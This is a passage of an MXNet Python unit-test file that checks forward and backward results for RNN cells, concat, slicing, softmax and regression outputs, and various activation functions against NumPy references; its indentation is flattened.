fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
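# NumPy reference softmax used by the checks below; subtracting the per-axis max
# before exponentiating keeps the computation numerically stable.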
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
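# ElementWiseSum check: the forward output must equal the NumPy sum of the inputs,
# and on backward every input must receive the upstream gradient unchanged.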
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0].asnumpy()
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a.asnumpy(), out_grad.asnumpy(), rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
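# Concat check: compare the forward result with np.concatenate along `dimension`
# and verify each input's gradient equals its slice of the output gradient.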
def check_concat_with_shape(shapes, dimension, skip_second):
    # If skip_second is True, the second argument will not have a gradient;
    # this exercises issue #1130.
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1.asnumpy(), ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad.asnumpy(), np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
        # test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i].asnumpy(), gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i].asnumpy(), gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0].asnumpy(), np_out, atol=atol)
assert_almost_equal(grad_map["data"].asnumpy(), out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
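# SoftmaxOutput gradient on a single 4-way example: the gradient w.r.t. the logits
# should be softmax(x) - one_hot(label).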
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
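# Same check with label smoothing: the target puts (1 - alpha) on the true class
# and alpha / (K - 1) on each of the remaining classes.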
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
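# With use_ignore=True, rows whose label equals ignore_label (0 here) must contribute
# (near-)zero gradient, while the remaining rows keep the same gradient as before.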
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
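# Generic SoftmaxOutput check: the forward output must match np_softmax and the
# gradient w.r.t. the logits must equal softmax(x) - label.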
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad.asnumpy(), np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
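# The default NumpyOp behaves as an identity: the output equals the input and the
# incoming gradient is passed through unchanged.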
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x.asnumpy(), exec1.outputs[0].asnumpy())
exec1.backward(dy)
assert_almost_equal(dy.asnumpy(), dx.asnumpy())
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0].asnumpy()
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
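# Composite scalar arithmetic: with f(x) = 4 - (x + 2) * 2/5 - 0.8 - (x != 0),
# d/dx [2 / f(x)] = -2 * f'(x) / f(x)^2 = 0.8 / f(x)^2, scaled below by the out-grad of 2.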
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
    npout_grad = 2 * npout_grad / (npout_1 * npout_1)
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
@unittest.skip("Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/12885")
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
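# SELU: lambda * x for x >= 0 and lambda * alpha * (exp(x) - 1) for x < 0, using the
# fixed self-normalizing constants alpha and lambda defined below.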
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
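# GELU (tanh approximation): 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3))).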
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0].asnumpy()
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
